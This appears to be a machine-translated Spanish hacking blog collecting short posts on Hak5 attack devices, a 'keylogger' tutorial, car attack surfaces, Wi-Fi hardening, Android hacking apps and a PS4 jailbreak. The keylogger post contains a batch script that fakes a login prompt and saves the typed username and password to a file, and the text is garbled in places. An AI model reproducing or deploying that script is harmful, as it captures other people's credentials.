Las herramientas que puede ayudarte a realizar un pentesting

Estas herramientas este realizadas por equipo de  Hak5                      

 En primer lugar  USB Rubber  Ducky es la herramienta original Ataque Inyección de teclas haciéndose pasar por un genérico USB Drive es una ingenieros sociales mejor amigo la herramienta de código abierto está programado fácilmente lo que le permite entregar las pulsaciones del teclado automatizados capaces de recolección de inteligencia, la instalación de puertas traseras, exfiltrating de datos y más todo sin pasar por la mayoría de las medidas de prevención.

duck_thumb_fa2571a3-a36f-460a-b68b-d29d74d87b2f_compact

Imágenes de Hak5  

En segundo lugar WiFi piña es el punto de acceso no autorizado de oro estándar.Capaz de imitar cualquier punto de acceso, este honeypot es altamente eficaz en la recolección de los clientes vulnerables y gestionado en persona o de forma remota a través de una sencilla interfaz web, el operador está preparada de forma única como man-in-the-middle que permite la recopilación de inteligencia, la redirección de acogida, la captura de credenciales y mucho más.

1_1024x1024

Imágenes de Hak5 

En tercer lugar   la LAN de la tortuga es una herramienta de Sistemas de Administración y pruebas de penetración encubierta proporcionar acceso remoto sigilo, la recopilación de inteligencia de red y capacidades de monitoreo-man-in-the-middle. Ubicado en un caso genérico “Adaptador USB Ethernet”, aspecto encubierta de la LAN Tortuga permite que se funden en muchos entornos de TI.

lanturtle1_1024x1024 (1).png

Imágenes de HAK 5 

Y las  puedes adquiere en este  link

Fuente de  Hak5 

Anuncios

¿Cómo realizar un keylogger en un bloc de notas?

¿Cómo  realizar  un keylogger en un bloc de notas?

Que es un Keylogger  es un tipo de software o un dispositivo hardware específico que se encarga de registrar las pulsaciones que se realizan en el teclado, para posteriormente memorizarlas en un fichero o enviarlas a través de internet.

Vamos hacer un  keylogger básico  para ver como funciona este keylogger  para principiantes este script  utilizares con fines de  aprendizaje

Paso uno Copiamos este pequeño srcipt  en nuestro bloc de notas.

@echo off 

color a 

title Login 

cls 

echo Please Enter Email Adress And Password 

echo. 

echo. 

cd “C:\Logs” 

set /p user=Username: 

set /p pass=Password: 

echo Username=”%user%” Password=”%pass%” >> Log.txt 

start >>Program Here<< 

exit 

Paso 2. Hacer una nueva carpeta en el escritorio y el nombre de Registros ( Si la carpeta no se llama Registros, entonces no va a funcionar.)

Paso 3.  Arrastre esa carpeta en el directorio C:\

Paso 5. Muy bien, ahora una vez lo pruebas, te vas de nuevo en la carpeta de registros en el directorio C:\ y .txt archivo estará en allí, [si usted hace una segunda entrada, el .txt archivo sobrescribirá sí.

Otro ejemplo de keylogger es como el que se muestra en la imagen.

keylogger-in-notepad

¿Qué elementos son hackeables en tu Automóvil inteligente ?

 

cochehackEl progreso dele tecnología  y al seguridad es algo imparable .La nueva tendencia  en el hacking  es hacking de autos  puedes pensar que esto es algo medio zafado perno no es así cunado Intel y McAfee se ha unido para realizar un documento  de buenas “practica”que para advertir a los desarrolladores y fabricantes que extremen la precaución en el diseño de nuevas tecnologías e interfaces, evitando así que la seguridad y la privacidad tanto de los pasajeros como de los peatones sea puesta en riesgo.

¿Qué elementos son susceptibles de ataque en un coche según Intel y McAfee?

  1. La conexión con nuestro smartphone. Esa conexión esta cada día mas presente en los modelos y con ello el riesgo de un ataque aprovechando esta interfaz inalámbrica aumenta.
  2. Remote Link Type App. Aplicaciones que se encuentran instaladas en nuestro smartphone y que se “ejecutan” en el equipo de entretenimiento del coche.
  3. Airbag ECU. El hardware y la centralita que controla el funcionamiento de los airbag no solo puede estar expuesto a un ataque, sino que además es un elemento crítico en la seguridad de un coche. Imaginaros ir conduciendo y que alguien dispare los airbags a distancia…
  4. OBD II. El puerto de datos – una conexión física presente en todos los coches – de nuestro vehículo. Esta forma fue de la que los hackers atacaron el Jeep Cherokee.
  5. USB. Si, al igual que tu ordenador, tu coche lleva conexiones USB aunque nunca las hayas vistoy pueden facilitar un acceso malicioso, que como en el caso anterior requeriría un acceso físico al interior de nuestro coche.
  6. Bluetooth. Aunque no lleves el móvil conectado, a diferencia de este tu coche está “abierto” al exterior mediante el uso de una interfaz inalámbrica Bluetooth. Existe, por tanto, el riesgo de que se pueda acceder a nuestro coche rompiendo la seguridad de los protocolos empleados por la conexión Bluetooth existe.
  7. Acceso “manos libres”. Se ha demostrado que los sistemas de acceso y arranque sin llave, que nos permiten acceder al coche sin extraer la llave del bolsillo, son susceptibles a ataques. Muy posiblemente, algun familiar te haya recomendado guarda tu llave de acceso en la nevera, pues no iba tan desencaminado…
  8. Apertura remota de puertas. Hoy en día ya es posible abrir las puertas sin necesidad de una llave. El único requisito es tener un teléfono móvil, descargar una aplicación y, claro esta, las credenciales de usuario del coche que queremos abrir.
  9. TPMS. Los sensores de presión de neumáticos también emplean un protocolo de conexión inalámbrico susceptible de ser atacado.
  10. La centralita de los sistemas de iluminación, interiores y exteriores.
  11. La centralita del motor del coche y la transmisión.
  12. Los sistemas de frenado y dirección, que cada vez son más independientes – pueden hasta funcionar de manera autónoma – y dependientes de lo que sucede a nuestro alrededor – ya que ese funcionamiento autónomo se basa en las condiciones que otros sensores exteriores detectan, por ejemplo, un peatón que cruza una calle sin mirar.
  13. La centralita de acceso del coche.
  14. Otras ayudas a la conducción, como los asistentes de aparcamiento automático, o el control de crucero adaptativo.
  15. Otras ayudas a la conducción, como los asistentes de aparcamiento automático, o el control de crucero adaptativo.

Así es  como los hacker pueden hacker tu carro  todo en este mundo que tenga aseo internet es hackeable para mas información puedes escuchar el podcast de Jaime Andrés Restrepo en Infosec Táctico Episodio 11 en canal de youtube de la comunidad  DragonJAR  

Fuente de: LA RED 

 

¿Cómo podemos proteger par que no te roben la señal de interne?

M_91.UBICACIÓN: Debe dar cobertura suficiente a su empresa /hogar sin que alcance a darle cobertura vecino de la equina.
2.ACCESO FISCO: Los AP no debe estar a la mano de cualquier persona debe estar en sitios que dificulten su acceso, como cajas con cerradura, techos o falso techos.
3.Configuración Por Defecto: Debe cambiar inmediatamente la calve de    acceso al router , cambiar la ip por defecto del router, además de  actualizar el firmware para corregir cualquier problema de seguridad que    tenga .
4.Cifrado: evitar usar cifrados debeléis como WEP deshabilite WPS y utilizar WPA o WPA2 con calve fuerte.
5.HARDENING: Para dificultar un poco la tarea a un atacante, oculte el         nombre de la red realice filtrado por MAC , deshabilite el DHCP LOS SERVIOS QUE NO NECESITE DEL ROUTER después de configurar el router y recuerde de apagar el router cuando no lo use .

Las 5 aplicaciones que debes tener en tu Android Para el Hacking

1. Andosid. Herramienta de Denegación de Servicios DOS para teléfonos Android que permite a los profesionales de seguridad simular un ataque DOS  y por supuesto un DDoS en un servidor web de teléfonos móviles.

2. Anti-Android Network Toolkit: – zANTI es un completo conjunto de herramientas de diagnóstico de red que permite realizar pentesting y pruebas de auditorías con sólo pulsar un botón. Proporciona informes basados en la nube que  guían a través de sencillas normas para garantizar la seguridad de la red.

3.APKInspector. APKinspector es una poderosa herramienta de interfaz gráfica de usuario que permite a los investigadores analizar aplicaciones Android.

 4.Fing. Descubre qué dispositivos están conectados a tu red Wi-Fi, en tan sólo unos segundos. Rápido y preciso, Fing es una aplicación profesional para el análisis de redes. Una interfaz sencilla e intuitiva te ayuda a evaluar los niveles de seguridad, detectar intrusos y resolver problemas de red.

5. sqlmapchik. Es un multiplataforma  GUI de la popular herramienta SQLMAP.

Cómo responder a una infección de malware en la empresa

La incidencia del malware en las empresas considera tres  cosas : cantidad, complejidad y diversidad a pesar de su antigüedad, sigue siendo una de las principales preocupaciones de las empresas y se materializa con frecuencia, por lo que resulta necesario conocer cómo responder ante un incidente.

Asimismo, se detallan los pasos a seguir para reportar muestras  a los Laboratorios de ESET, que las analizan con el propósito de ayudar a la comunidad entendiendo el comportamiento de los programas maliciosos hallados.

Naturalmente, el uso de la tecnología de seguridad es necesario en el contexto actual de amenazas informáticas; la aplicación de medidas de protección preventivas, proactivas y reactivas, por tanto, ayudará a mitigar el impacto del malware en las empresas.

Fuente de :  ESET 

Hacker Confirma PlayStation 4 Jalibreak! Explotar podria abrir las puertas para piratas juegos

Sony PlayStation 4 – la consola de juegos más caliente-venta en los Estados Unidos – ha estado en el mercado por un tiempo ahora, y desde su lanzamiento, los hackers han estado jugando con él para encontrar una forma de ejecutar software no autorizado.

Aunque romper la protección en PlayStation 4 es un gran negocio, un hacker que se hace llamar CTurt ha pretendido desarrollar una versión totalmente jailbreak de la PlayStation 4 con la ayuda de un núcleo de explotación que creó anteriormente.
La fuga de la cárcel actual permite el vertido de la RAM del sistema de otros procesos y la instalación de firmware personalizado que se puede utilizar para ejecutar aplicaciones homebrew que no están aprobados por Sony  Por supuesto, todavía hay algunos otros problemas de seguridad para sobrevivir, pero es un pie en la puerta para la piratería juego, que puede afectar el mercado del juego en su conjunto.
La cuenta de Twitter de CTurt parece indicar que en la actualidad el exploit sólo funciona para PlayStation 4 versión de firmware 1.76, pero al parecer puede ser ajustado para trabajar para el firmware más reciente.
Sin título
CTurt logró con éxito para tomar ventaja de una explotación en la PlayStation 4 v1.76 para inyectar un código externo en el sistema, tomando así el control del hardware.
Sony sin duda sería infeliz con el lanzamiento de PlayStation 4 jailbreak y estaría tratando de eliminar las vulnerabilidades para la versión más reciente de firmware PS4.
fuente de : http://thehackernews.com/